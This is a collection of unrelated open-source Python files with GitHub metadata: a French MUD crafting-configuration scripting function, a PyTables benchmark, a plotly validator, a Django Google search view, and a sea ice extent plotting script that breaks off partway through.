"line_count": 8,
"max_line_length": 41,
"avg_line_length": 20.5,
"alnum_prop": 0.5975609756097561,
"repo_name": "okin/doit",
"id": "bc5237d3fa81797c1ded76e5425b1346bad70527",
"size": "165",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "doc/tutorial/settrace.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "182"
},
{
"name": "C++",
"bytes": "46"
},
{
"name": "Python",
"bytes": "566114"
}
],
"symlink_target": ""
}
|
"""Fichier contenant la fonction configuration."""
from fractions import Fraction
from primaires.scripting.fonction import Fonction
from primaires.scripting.instruction import ErreurExecution
# Conversion helper
def convertir_liste(liste):
"""Recursively convert the list passed as argument."""
for i, elt in enumerate(liste):
if isinstance(elt, (int, float)):
liste[i] = Fraction(elt)
elif isinstance(elt, list):
convertir_liste(elt)
class ClasseFonction(Fonction):
"""Retourne la configuration d'une salle, personnage ou objet."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.configuration_salle, "Salle", "str")
cls.ajouter_types(cls.configuration_personnage, "Personnage", "str")
cls.ajouter_types(cls.configuration_objet, "Objet", "str")
cls.ajouter_types(cls.configuration_chaine, "str", "str")
@staticmethod
def configuration_salle(salle, nom_configuration):
"""Retourne la configuration spécifique à une salle.
La configuration est le résultat de l'extension du
crafting. Chaque guilde peut configurer ses propres
extensions d'éditeur. Cette fonction scripting permet de
récupérer la valeur particulière. Si la configuration n'existe
pas, retourne simplement une variable vide. Vous pouvez
(et devriez) contrôler la validité de la variable retournée
grâce à une simple condition (voir les exemples plus bas).
Paramètres à préciser :
* salle : la salle dont on veut récupérer la configuration
* nom_configuration : le nom de la configuration (une chaîne)
Si vous avez créé, dans une guilde, une extension dont le
nom est "forme" s'appliquant à l'éditeur de salle, par exemple,
vous pouvez récupérer la valeur pour chaque salle configurée
grâce à l'instruction :
forme = configuration(salle, "forme")
Assurez-vous que la configuration existe. Si la configuration
n'a pas été renseignée dans l'éditeur, elle sera vide.
si forme:
# forme n'est pas vide, vous pouvez travailler avec
"""
donnee = getattr(importeur.crafting.configuration[salle],
nom_configuration)
if isinstance(donnee, (int, float)):
donnee = Fraction(donnee)
elif isinstance(donnee, list):
# Dereference (copy the list)
donnee = list(donnee)
convertir_liste(donnee)
return donnee
@staticmethod
def configuration_personnage(personnage, nom_configuration):
"""Retourne la configuration spécifique à un personnage.
La configuration est le résultat de l'extension du
crafting. Chaque guilde peut configurer ses propres
extensions d'éditeur. Cette fonction scripting permet de
récupérer la valeur particulière. Si la configuration n'existe
pas, retourne simplement une variable vide. Vous pouvez
(et devriez) contrôler la validité de la variable retournée
grâce à une simple condition (voir les exemples plus bas).
Notez que si vous passez un joueur à cette fonction, le
retour sera toujours vide (les joueurs n'ont pas de
configuration crafting propre). Les PNJ retourneront la
configuration spécifique de leur prototype, car la configuration
est définie au niveau prototype, pas au niveau PNJ.
Paramètres à préciser :
* personnage : le personnage spécifique
* nom_configuration : le nom de la configuration (une chaîne)
Si vous avez créé, dans une guilde, une extension dont le
nom est "humeur" s'appliquant à l'éditeur de PNJ, par exemple,
vous pouvez récupérer la valeur pour chaque PNJ configuré
grâce à l'instruction :
humeur = configuration(pnj, "humeur")
Assurez-vous que la configuration existe. Si la configuration
n'a pas été renseignée dans l'éditeur, elle sera vide.
si humeur:
# humeur n'est pas vide, vous pouvez travailler avec
"""
prototype = getattr(personnage, "prototype", None)
if prototype is None:
return None
donnee = getattr(importeur.crafting.configuration[prototype],
nom_configuration)
if isinstance(donnee, (int, float)):
donnee = Fraction(donnee)
elif isinstance(donnee, list):
# Dereference (copy the list)
donnee = list(donnee)
convertir_liste(donnee)
return donnee
@staticmethod
def configuration_objet(objet, nom_configuration):
"""Retourne la configuration spécifique à un objet.
La configuration est le résultat de l'extension du
crafting. Chaque guilde peut configurer ses propres
extensions d'éditeur. Cette fonction scripting permet de
récupérer la valeur particulière. Si la configuration n'existe
pas, retourne simplement une variable vide. Vous pouvez
(et devriez) contrôler la validité de la variable retournée
grâce à une simple condition (voir les exemples plus bas).
Notez que les objets retourneront la configuration
spécifique de leur prototype, car la configuration est
définie au niveau prototype, pas au niveau objet.
Paramètres à préciser :
* objet : l'objet spécifique
* nom_configuration : le nom de la configuration (une chaîne)
Si vous avez créé, dans une guilde, une extension dont le
nom est "qualité" s'appliquant à l'éditeur d'objet, par exemple,
vous pouvez récupérer la valeur pour chaque objet configuré
grâce à l'instruction :
qualite = configuration(objet, "qualité")
Notez que le même système s'applique pour des types
particuliers avec leurs extensions spécifiques.
Assurez-vous que la configuration existe. Si la configuration
n'a pas été renseignée dans l'éditeur, elle sera vide.
si qualite:
# qualite n'est pas vide, vous pouvez travailler avec
"""
prototype = getattr(objet, "prototype", None)
if prototype is None:
return None
donnee = getattr(importeur.crafting.configuration[prototype],
nom_configuration)
if isinstance(donnee, (int, float)):
donnee = Fraction(donnee)
elif isinstance(donnee, list):
# Dereference (copy the list)
donnee = list(donnee)
convertir_liste(donnee)
return donnee
@staticmethod
def configuration_chaine(adresse, nom_configuration):
"""Retourne la configuration spécifique à un donnée variable.
La configuration est le résultat de l'extension du
crafting. Chaque guilde peut configurer ses propres
extensions d'éditeur. Cette fonction scripting permet de
récupérer la valeur particulière. Si la configuration n'existe
pas, retourne simplement une variable vide. Vous pouvez
(et devriez) contrôler la validité de la variable retournée
grâce à une simple condition (voir les exemples plus bas).
À la différence des autres usages, vous devez ici préciser
en premier paramètre l'adresse d'une donnée sous la forme
d'une chaîne : par exemple, "zone picte" pour récupérer
l'extension de la zone Picte. Ce système permet de récupérer
certaines données qui ne sont pas définies en crafting (comme
les zones).
Paramètres à préciser :
* adresse : l'adresse de l'information configurée (une chaîne)
* nom_configuration : le nom de la configuration (une chaîne)
Si vous avez créé, dans une guilde, une extension dont le
nom est "qualité" s'appliquant à l'éditeur de zone, par exemple,
vous pouvez récupérer la valeur pour chaque zone configurée
grâce à l'instruction :
qualite = configuration("zone NOMZONE", "qualité")
Notez que le même système s'applique pour des types
particuliers avec leurs extensions spécifiques.
Assurez-vous que la configuration existe. Si la configuration
n'a pas été renseignée dans l'éditeur, elle sera vide.
si qualite:
# qualite n'est pas vide, vous pouvez travailler avec
"""
adresse = adresse.lower()
objets = {
"prototype d'objet": importeur.objet._prototypes,
"zone": importeur.salle.zones,
}
objet = None
for nom, dictionnaire in objets.items():
if adresse.startswith(nom + " "):
cle = adresse[len(nom) + 1:]
if cle not in dictionnaire:
raise ValueError("{} introuvable : {}".format(
nom, repr(cle)))
objet = dictionnaire[cle]
break
if objet is None:
raise ErreurExecution("Adresse {} introuvable".format(
repr(adresse)))
donnee = getattr(importeur.crafting.configuration[objet],
nom_configuration)
if isinstance(donnee, (int, float)):
donnee = Fraction(donnee)
elif isinstance(donnee, list):
# Déréférence
donnee = list(donnee)
convertir_liste(donnee)
return donnee
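    # Illustrative walk-through (not part of the original module): for the
    # address "zone picte", the loop above matches the "zone" prefix, takes
    # "picte" as the key and looks it up in importeur.salle.zones; the
    # requested extension value is then read from
    # importeur.crafting.configuration for that zone, exactly as in the
    # scripting example shown in the docstring.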
|
{
"content_hash": "8a25505a5facc2c21fe092bccb619d3e",
"timestamp": "",
"source": "github",
"line_count": 249,
"max_line_length": 76,
"avg_line_length": 37.99598393574297,
"alnum_prop": 0.6468660818095339,
"repo_name": "stormi/tsunami",
"id": "63f6268ddcf54cdfc22bb75e02f8845ecd2127ab",
"size": "11188",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/secondaires/crafting/fonctions/configuration.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7188300"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
import hotshot
import hotshot.stats
import unittest
import os
import tempfile
from tables import *
verbose = 0
class WideTreeTestCase(unittest.TestCase):
"""Checks for maximum number of childs for a Group."""
def test00_Leafs(self):
"""Checking creation of large number of leafs (1024) per group.
Variable 'maxchilds' controls this check. PyTables support up to
4096 childs per group, but this would take too much memory (up
to 64 MB) for testing purposes (may be we can add a test for big
platforms). A 1024 childs run takes up to 30 MB. A 512 childs
test takes around 25 MB.
"""
import time
maxchilds = 1000
if verbose:
print('\n', '-=' * 30)
print("Running %s.test00_wideTree..." % self.__class__.__name__)
print("Maximum number of childs tested :", maxchilds)
# Open a new empty HDF5 file
#file = tempfile.mktemp(".h5")
file = "test_widetree.h5"
fileh = open_file(file, mode="w")
if verbose:
print("Children writing progress: ", end=' ')
for child in range(maxchilds):
if verbose:
print("%3d," % (child), end=' ')
a = [1, 1]
fileh.create_group(fileh.root, 'group' + str(child),
"child: %d" % child)
fileh.create_array("/group" + str(child), 'array' + str(child),
a, "child: %d" % child)
if verbose:
print()
# Close the file
fileh.close()
t1 = time.time()
# Open the previous HDF5 file in read-only mode
fileh = open_file(file, mode="r")
print(("\nTime spent opening a file with %d groups + %d arrays: "
"%s s" % (maxchilds, maxchilds, time.time() - t1)))
if verbose:
print("\nChildren reading progress: ", end=' ')
# Close the file
fileh.close()
# Then, delete the file
# os.remove(file)
def test01_wideTree(self):
"""Checking creation of large number of groups (1024) per group.
Variable 'maxchilds' controls this check. PyTables support up to
4096 childs per group, but this would take too much memory (up
to 64 MB) for testing purposes (may be we can add a test for big
platforms). A 1024 childs run takes up to 30 MB. A 512 childs
test takes around 25 MB.
"""
import time
maxchilds = 1000
if verbose:
print('\n', '-=' * 30)
print("Running %s.test00_wideTree..." % self.__class__.__name__)
print("Maximum number of childs tested :", maxchilds)
# Open a new empty HDF5 file
file = tempfile.mktemp(".h5")
#file = "test_widetree.h5"
fileh = open_file(file, mode="w")
if verbose:
print("Children writing progress: ", end=' ')
for child in range(maxchilds):
if verbose:
print("%3d," % (child), end=' ')
fileh.create_group(fileh.root, 'group' + str(child),
"child: %d" % child)
if verbose:
print()
# Close the file
fileh.close()
t1 = time.time()
# Open the previous HDF5 file in read-only mode
fileh = open_file(file, mode="r")
print("\nTime spent opening a file with %d groups: %s s" %
(maxchilds, time.time() - t1))
# Close the file
fileh.close()
# Then, delete the file
os.remove(file)
#----------------------------------------------------------------------
def suite():
theSuite = unittest.TestSuite()
theSuite.addTest(unittest.makeSuite(WideTreeTestCase))
return theSuite
if __name__ == '__main__':
prof = hotshot.Profile("widetree.prof")
    prof.runcall(unittest.main, defaultTest='suite')
prof.close()
stats = hotshot.stats.load("widetree.prof")
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(20)
|
{
"content_hash": "a89a0092c4aa08692e531f1f722882ae",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 76,
"avg_line_length": 32.724409448818896,
"alnum_prop": 0.5459576515880654,
"repo_name": "joonro/PyTables",
"id": "c5f6651b1c84d28c4aa6ad3f9c671e3c2c7d2f8d",
"size": "4156",
"binary": false,
"copies": "12",
"ref": "refs/heads/develop",
"path": "bench/widetree.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "896101"
},
{
"name": "C++",
"bytes": "97380"
},
{
"name": "CMake",
"bytes": "21598"
},
{
"name": "Gnuplot",
"bytes": "2104"
},
{
"name": "Makefile",
"bytes": "4159"
},
{
"name": "Objective-C",
"bytes": "1404"
},
{
"name": "Python",
"bytes": "3322852"
},
{
"name": "Shell",
"bytes": "16985"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(self, plotly_name="size", parent_name="table.cells.font", **kwargs):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 1),
**kwargs,
)
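# Illustrative usage sketch (not part of the original module); it assumes the
# standard `validate_coerce` interface that plotly validators inherit from
# `_plotly_utils.basevalidators.BaseValidator`:
#
#     validator = SizeValidator()
#     validator.validate_coerce(12)        # accepted: size must be a number >= 1
#     validator.validate_coerce([10, 14])  # arrays are allowed (array_ok=True)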
|
{
"content_hash": "b0e73b46943306ac29c2ef23969b5ef9",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 85,
"avg_line_length": 37.38461538461539,
"alnum_prop": 0.5925925925925926,
"repo_name": "plotly/plotly.py",
"id": "2a30886b391f6c1b3702a5f4b260c79cb9b383db",
"size": "486",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/table/cells/font/_size.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
}
|
from django.views.generic import TemplateView
#from apiclient.discovery import build
from googleapiclient.discovery import build
from .utils import SearchResults
from . import *
class SearchView(TemplateView):
template_name = "googlesearch/search_results.html"
def get_context_data(self, **kwargs):
context = super(SearchView, self).get_context_data(**kwargs)
service = build("customsearch", GOOGLE_SEARCH_API_VERSION,
developerKey=GOOGLE_SEARCH_API_KEY)
#add a "try" block to see if googleapiclient throws a 400 error
try:
results = service.cse().list(
q=self.request.GET.get('q', ''),
start=self.page_to_index(),
num=GOOGLE_SEARCH_RESULTS_PER_PAGE,
cx=GOOGLE_SEARCH_ENGINE_ID,
).execute()
results = SearchResults(results)
pages = self.calculate_pages()
        #if googleapiclient raises an error, we need to catch it here
        except Exception:
            #run the search again starting from a fixed page 1 instead of the user-defined page
results = service.cse().list(
q=self.request.GET.get('q', ''),
start=1,
num=GOOGLE_SEARCH_RESULTS_PER_PAGE,
cx=GOOGLE_SEARCH_ENGINE_ID,
).execute()
#set some default values used for the context below
page = 1
# previous, current, next pages
pages = [0, 1, 2]
results = SearchResults(results)
""" Set some defaults """
context.update({
'items': [],
'total_results': 0,
'current_page': 0,
'prev_page': 0,
'next_page': 0,
'search_terms': self.request.GET.get('q', ''),
'error': results
})
""" Now parse the results and send back some
useful data """
context.update({
'items': results.items,
'total_results': results.total_results,
'current_page': pages[1],
'prev_page': pages[0],
'next_page': pages[2],
'search_terms': results.search_terms,
})
return context
def calculate_pages(self):
""" Returns a tuple consisting of
the previous page, the current page,
and the next page """
current_page = int(self.request.GET.get('p', 1))
return (current_page - 1, current_page, current_page + 1)
def page_to_index(self, page=None):
""" Converts a page to the start index """
if page is None:
page = self.request.GET.get('p', 1)
return int(page) * int(GOOGLE_SEARCH_RESULTS_PER_PAGE) + 1 - int(GOOGLE_SEARCH_RESULTS_PER_PAGE)
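    # Illustrative arithmetic (not from the original module): the expression
    # above is (page - 1) * per_page + 1, so with
    # GOOGLE_SEARCH_RESULTS_PER_PAGE = 10 (an assumed value), page 1 maps to
    # start index 1, page 2 to 11 and page 3 to 21, matching the 1-based
    # `start` parameter of the Custom Search API.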
|
{
"content_hash": "02a5afc152b3fd32a66198593869e51b",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 104,
"avg_line_length": 31.920454545454547,
"alnum_prop": 0.551441794232823,
"repo_name": "hzdg/django-google-search",
"id": "c987f60790823115ceed6a494abece037e26fee0",
"size": "2809",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "googlesearch/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1314"
},
{
"name": "Python",
"bytes": "6288"
}
],
"symlink_target": ""
}
|
"""
Global Sea Ice Extent Graph for 1979-Current
Website : https://github.com/emmatoday/PyClimateGraphs
Author : Emma M - GitHub: @emmatoday
Date : 15 February 2017
This code will download and render a current graph of the global sea ice
extent, covering 1979 through yesterday (based on availability of the data
from the NSIDC).
Requisite data files (in case you need to manually download them):
ftp://sidads.colorado.edu:21/DATASETS/NOAA/G02135/south/daily/data/S_seaice_extent_daily_v2.1.csv
ftp://sidads.colorado.edu:21/DATASETS/NOAA/G02135/north/daily/data/N_seaice_extent_daily_v2.1.csv
"""
# Load all needed libraries
from __future__ import unicode_literals
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.dates as mdates
import matplotlib.colors as c
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from scipy import stats
import datetime as dt
import os
import math
import calendar
import urllib.parse
import urllib.request
import shutil
import sys
import logging
from pprint import pprint
# Set up some constants
DATA_PATH = './data' # Path to data directory
OUTPUT_PATH = './output' # Path to output plot images
OUTDATED_DAYS = 3 # Days after which data is considered outdated
PRE_YEAR = 2010 # Year before which the "pre" data is taken
ROLLING_WINDOW = 7
# URLs where we can fetch the data files
DATA_URLS = {
's': 'ftp://sidads.colorado.edu:21/DATASETS/NOAA/G02135/south/daily/data/'
'S_seaice_extent_daily_v2.1.csv',
'n': 'ftp://sidads.colorado.edu:21/DATASETS/NOAA/G02135/north/daily/data/'
'N_seaice_extent_daily_v2.1.csv'
}
def mkdir_if_necessary(dir):
"""
    Check if the given directory exists, creating it if necessary.
"""
try:
os.stat(dir)
except OSError:
os.mkdir(dir)
def data_files_exist():
    """
    Check if all of our data files already exist on disk.
    """
    for key, url in DATA_URLS.items():
        filename = os.path.split(urllib.parse.urlsplit(url).path)[-1]
        if not os.path.isfile(os.path.join(DATA_PATH, filename)):
            return False
    return True
def load_data_files():
"""
Load the data from disk and return the dataframes.
"""
sea_ice_indexes = {}
for key, url in DATA_URLS.items():
filename = os.path.split(urllib.parse.urlsplit(url).path)[-1]
sea_ice_indexes[key] = \
pd.read_csv(os.path.join(DATA_PATH, filename), skiprows=[1])
for key in sea_ice_indexes.keys():
sea_ice_indexes[key].rename(columns=lambda x: x.strip(), inplace=True)
sea_ice_indexes[key]['Date'] = sea_ice_indexes[key]\
.apply(lambda row: dt.date(row['Year'],
row['Month'],
row['Day']), axis=1)
sea_ice_indexes[key]['Date'] = \
pd.to_datetime(sea_ice_indexes[key]['Date'])
minday = np.min(sea_ice_indexes[key]['Date'])
maxday = np.max(sea_ice_indexes[key]['Date'])
newframe = {'Date': pd.Series(pd.date_range(minday, maxday).tolist())}
date_df = pd.DataFrame(newframe)
sea_ice_indexes[key] = pd.merge(left=date_df,
right=sea_ice_indexes[key],
on='Date', how='left')
sea_ice_indexes[key]['Day of Year'] = \
sea_ice_indexes[key] \
.apply(lambda row: row['Date'].timetuple().tm_yday, axis=1)
sea_ice_indexes[key]['Year'] = \
sea_ice_indexes[key] \
.apply(lambda row: row['Date'].year, axis=1)
sea_ice_indexes[key]['Month'] = \
sea_ice_indexes[key] \
.apply(lambda row: row['Date'].month, axis=1)
sea_ice_indexes[key]['Day'] = \
sea_ice_indexes[key] \
.apply(lambda row: row['Date'].day, axis=1)
sea_ice_indexes[key]['Extent'] = \
sea_ice_indexes[key]['Extent'].rolling(window=ROLLING_WINDOW,
center=False).mean()
sea_ice_indexes['s'].rename(columns={'Extent': 'S Extent'}, inplace=True)
sea_ice_indexes['n'].rename(columns={'Extent': 'N Extent'}, inplace=True)
return sea_ice_indexes
def data_is_fresh(sea_ice_indexes, outdated_days=OUTDATED_DAYS):
"""
Check if our data appears to be out of date.
"""
    for key, sea_ice_index in sea_ice_indexes.items():
        print('Data is {0} day(s) old'
              .format((dt.datetime.now() -
                       sea_ice_index['Date'].iloc[-1]).days))
        if (dt.datetime.now() -
                sea_ice_index['Date'].iloc[-1]).days >= outdated_days:
            return False
    return True
def refresh_data_files():
"""
Update datafiles to the latest available from the data URLs.
"""
for key, url in DATA_URLS.items():
url_path = urllib.parse.urlsplit(url).path
url_filename = os.path.split(url_path)[-1]
filename = os.path.join(DATA_PATH, url_filename)
with urllib.request.urlopen(url) as response:
with open(filename, 'wb') as out_file:
shutil.copyfileobj(response, out_file)
def prep_data_files():
"""
Prepare and load the data files downloading and updating as necessary.
"""
mkdir_if_necessary(DATA_PATH)
mkdir_if_necessary(OUTPUT_PATH)
if data_files_exist():
print('Data files exist')
sea_ice_indexes = load_data_files()
if data_is_fresh(sea_ice_indexes):
print('Data files are up to date')
else:
print('Data files are outdated')
refresh_data_files()
sea_ice_indexes = load_data_files()
print('Data files have been updated')
else:
print('No data files found')
refresh_data_files()
sea_ice_indexes = load_data_files()
print('Data files have been downloaded')
return sea_ice_indexes
def running_mean(x, N=2):
return np.convolve(x, np.ones((N,))/N)[(N-1):]
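# Illustrative note (not part of the original script): running_mean is a
# trailing N-point average computed by convolution; e.g.
#   running_mean([1, 2, 3, 4], N=2) gives [1.5, 2.5, 3.5, 2.0]
# where the final value is an edge artifact because only the leading edge of
# the 'full' convolution is trimmed.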
def plot(gbl_seaice, column, suptitle, light_style=False, infotext='bottom',
filebase='global_sea_ice', ymin=14, ymax=30, pdf=True, png=True,
legend_loc='lower right'):
"""
Plots graph of a given light_style and creates PDF and PNG outputs.
"""
# Set up foreground background colors based on light_style
if light_style:
FG_COLOR = [0, 0, 0]
BG_COLOR = [1, 1, 1]
else:
FG_COLOR = [1, 1, 1]
BG_COLOR = [0, 0, 0]
now = dt.datetime.now()
cur_mon = str(now.month - 1)
cur_day = str(now.day)
cur_year = str(now.year)
iso_date = dt.date.today().isoformat()
# Get all pre-2010 data grouped by day of year
pre_x = gbl_seaice[(gbl_seaice['Year'] < PRE_YEAR) &
(gbl_seaice['Year'] >= 1978)].groupby(['Day of Year'])
# Calculate average extent for each day of the year in the pre-2010 data
mean = pre_x[column].mean()
sigma = pre_x[column].std()
# Get all the data grouped by each year for plotting
year_groups = gbl_seaice.groupby(['Year'])
# Make plot
plt.rc('savefig', facecolor=BG_COLOR)
plt.rc('axes', edgecolor=FG_COLOR)
plt.rc('xtick', color=FG_COLOR)
plt.rc('ytick', color=FG_COLOR)
plt.rc('axes', labelcolor=FG_COLOR)
plt.rc('axes', facecolor=BG_COLOR)
plt.rc('text', usetex=True)
plt.rc('font', **{'family': 'sans-serif', 'sans-serif': ['Avant Garde']})
# Create figure to plot
fig = plt.figure()
ax = plt.subplot(111)
# Add some extra space at the bottom of the plot
plt.subplots_adjust(bottom=0.14)
ax.tick_params('both', length=7.5, width=2, which='major')
# Adjust spines
spines = ['left', 'bottom']
for loc, spine in ax.spines.items():
if loc in spines:
spine.set_position(('outward', 6))
else:
spine.set_color('none')
if 'left' in spines:
ax.yaxis.set_ticks_position('left')
else:
ax.yaxis.set_ticks([])
if 'bottom' in spines:
ax.xaxis.set_ticks_position('bottom')
else:
ax.xaxis.set_ticks([])
ax.spines['top'].set_color('none')
ax.spines['right'].set_color('none')
gridlines = ax.get_xgridlines() + ax.get_ygridlines()
# Set grid line style
for line in gridlines:
line.set_linestyle('dotted')
line.set_linewidth(0.3)
line.set_color(FG_COLOR)
line.set_alpha(0.2)
line.set_zorder(-5)
minday = np.min(gbl_seaice['Day of Year'])
maxday = np.max(gbl_seaice['Day of Year'])
doy = np.arange(minday, maxday+1)
# import pdb
# pdb.set_trace()
pl = []
def plot_sigma(plt, doy, sigma, n, color=FG_COLOR, alpha=1, lw=0):
"""
        Plots the standard deviations.
"""
label = u'{0}$\sigma$ (pre-{1})'.format(n, PRE_YEAR)
return plt.fill_between(doy, mean+sigma*n, mean-sigma*n,
facecolor=color, alpha=alpha, linewidth=lw,
label=label, zorder=-10)
def mod_color(rgb_color, multiplier=0.15, light_style=light_style):
"""
Takes an RGB color (three float list) and adjusts the colors by the
multiplier values.
"""
hsv_color = c.rgb_to_hsv(rgb_color)
logging.debug('Input color value: {0}'.format(hsv_color[2]))
if light_style:
hsv_color[1] = hsv_color[1] * multiplier
else:
hsv_color[2] = hsv_color[2] * multiplier
logging.debug('Output color value: {0}'.format(hsv_color[2]))
return c.hsv_to_rgb(hsv_color)
pl.append(plot_sigma(plt, doy, sigma, 5,
color=mod_color([1, 0, 0.2], 0.225)))
pl.append(plot_sigma(plt, doy, sigma, 4,
color=mod_color([1, 0, 0.2], 0.125)))
pl.append(plot_sigma(plt, doy, sigma, 3,
color=mod_color([1, 0.7, 0])))
pl.append(plot_sigma(plt, doy, sigma, 2,
color=mod_color([0, 1, 0])))
pl.append(plot_sigma(plt, doy, sigma, 1,
color=BG_COLOR))
# Line width for mean and recent years
lw = 2.5
# Plot mean (with outline of BG_COLOR)
plt.plot(doy, mean, color=BG_COLOR, linewidth=lw+1.5,
zorder=2, linestyle='-')[0]
pl.append(plt.plot(doy, mean, color=FG_COLOR, linewidth=lw,
label='Mean (pre-{0})'.format(PRE_YEAR),
zorder=2, linestyle='-')[0])
# Get count of years of data
year_count = gbl_seaice['Year'].max() - gbl_seaice['Year'].min()
# Number of manually configured years
manual_years = 2
# Set colormap value depending on light/dark
if light_style:
color_map_end = 0.1
else:
color_map_end = 0.35
# Use colormap for each year (avoiding the darkest 35% of magma colors)
color = iter(plt.cm.magma(np.linspace(1, color_map_end,
year_count - manual_years)))
# Plot every year's specific data, some with manually set formatting
for key, grp in year_groups:
if (key >= 1979 and key <= 2018) or key >= 2016:
if key == 2017:
pl.append(plt.plot(grp[column], c='#ff00bb',
zorder=3, linewidth=lw, label=key)[0])
elif key == 2016:
pl.append(plt.plot(grp[column], c='#bb00ff',
zorder=3, linewidth=lw, label=key)[0])
# elif key == 2015:
# pl.append(plt.plot(grp['Total Extent'], c='red',
# zorder=2, linewidth=lw, label=key)[0])
# elif key == 2014:
# pl.append(plt.plot(grp['Total Extent'], c='orange',
# zorder=2, linewidth=lw, label=key)[0])
# elif key == 2013:
# pl.append(plt.plot(grp['Total Extent'], c='yellow',
# zorder=2, linewidth=lw, label=key)[0])
# elif key == 2012:
# pl.append(plt.plot(grp['Total Extent'], c='#00ff00',
# zorder=2, linewidth=lw, label=key)[0])
else:
# Plot all non-manually configured years
plt.plot(grp[column], c=next(color),
zorder=1, linewidth=0.7, alpha=0.5)
# Adjust legend and axes and plot them
le = plt.legend(shadow=False, fontsize=9, loc=legend_loc, fancybox=True,
ncol=2, handles=pl)
for text in le.get_texts():
text.set_color(FG_COLOR)
# Move ylabel a bit to the left for pretty, then plot the label
ax.yaxis.labelpad = 11
plt.ylabel(r'\textbf{Sea Ice Extent [$\times$10$^{6}$ sq. km, '
'%d day rolling avg.]}' % (ROLLING_WINDOW),
fontsize=13)
# Setup x-ticks and plot them
xlabels = calendar.month_abbr[1:13]
xlocations = list(map(lambda x: x+15, np.linspace(1, 366, 13)))
plt.xticks(np.linspace(1, 366, 13))
plt.setp(ax.get_xmajorticklabels(), visible=False)
ax.xaxis.set_minor_locator(ticker.FixedLocator(xlocations))
ax.xaxis.set_minor_formatter(ticker.FixedFormatter(xlabels))
plt.xlim([1, 366])
# Setup y-ticks and plot them
plt.yticks(np.arange(ymin, ymax + 2, 2),
map(str, np.arange(ymin, ymax + 2, 2)), fontsize=13)
plt.ylim([ymin, ymax])
# Adjust ytick label position
for tick in ax.yaxis.get_major_ticks():
tick.set_pad(4)
# Adjust xtick label position
for tick in ax.xaxis.get_minor_ticks():
tick.set_pad(0)
# Add all the misc info text to the figure
def it_annotate(text, infotext, it_offset_num):
it_xpos = 0
it_ypos = 0
it_offset_xbase = 1
it_offset_ybase = 1.25
it_offset_ysep = 7
it_pos_unit = 'axes fraction'
it_textcoords = 'offset points'
if infotext == 'top':
it_ypos = 1
it_offset_ybase = it_offset_ybase * -1 - 5.25
it_offset_ysep = it_offset_ysep * -1
it_xy = (it_xpos, it_ypos)
xytext = (it_offset_xbase, it_offset_ybase +
it_offset_num * it_offset_ysep)
ax.annotate(text,
fontsize=7.0, color=FG_COLOR, xy=it_xy, xytext=xytext,
xycoords=it_pos_unit, textcoords=it_textcoords, ha='left')
it_annotate(r'\textbf{DATA:} NSIDC Sea Ice Index, Version 2 (G02135)',
infotext=infotext, it_offset_num=2)
it_annotate(r'\textbf{CSV:} '
'ftp://sidads.colorado.edu/DATASETS/NOAA/G02135/',
infotext=infotext, it_offset_num=1)
it_annotate(r'\textbf{GRAPHIC:} Emma M (GitHub: @emmatoday)',
infotext=infotext, it_offset_num=0)
ax.annotate(r'(For non-bold years, more recent years are more purple)',
fontsize=9, color=FG_COLOR, backgroundcolor=BG_COLOR,
xy=(0.5, 0.065),
xycoords='figure fraction', ha='center')
ax.annotate(r'Updated %s' % (iso_date),
fontsize=9, color=FG_COLOR, backgroundcolor=BG_COLOR,
xy=(0.5, 0.03),
xycoords='figure fraction', ha='center')
fig.suptitle(suptitle, fontsize=24, color=FG_COLOR, y=0.965)
if light_style:
output_filebase = '{0}_{1}_light'.format(filebase, iso_date)
else:
output_filebase = '{0}_{1}_dark'.format(filebase, iso_date)
if pdf:
pdf_filename = output_filebase + '.pdf'
plt.savefig(os.path.join(OUTPUT_PATH, pdf_filename), dpi=900)
print('\n' 'PDF Figure ({0}) plotted!'.format(pdf_filename))
if png:
png_filename = output_filebase + '.png'
plt.savefig(os.path.join(OUTPUT_PATH, png_filename), dpi=900)
print('\n' 'PNG Figure ({0}) plotted!'.format(png_filename))
def main():
"""
Main function that is called when script is executed from the CLI.
"""
now = dt.datetime.now()
cur_year = str(now.year)
# Prepare and load the data files downloading and updating as necessary
sea_ice_indexes = prep_data_files()
sea_ice_indexes['n'] = sea_ice_indexes['n'][['N Extent', 'Date']]
gbl_seaice = pd.merge(left=sea_ice_indexes['s'],
right=sea_ice_indexes['n'],
on='Date')
gbl_seaice.drop(['Missing', 'Source Data'], axis=1, inplace=True)
# Interpolate to fill in missing data in older years
gbl_seaice.interpolate(inplace=True)
# Add N and S to get global total ice extent
gbl_seaice['Total Extent'] = \
gbl_seaice['S Extent'] + gbl_seaice['N Extent']
# Set the index of the data to be the day of year
gbl_seaice.index = gbl_seaice['Day of Year']
    # Set the index type to a datetime
gbl_seaice.index = gbl_seaice.index.astype(dt.datetime)
n_seaice = gbl_seaice.drop(['Day', 'Date',
'Month', 'Total Extent', 'S Extent'],
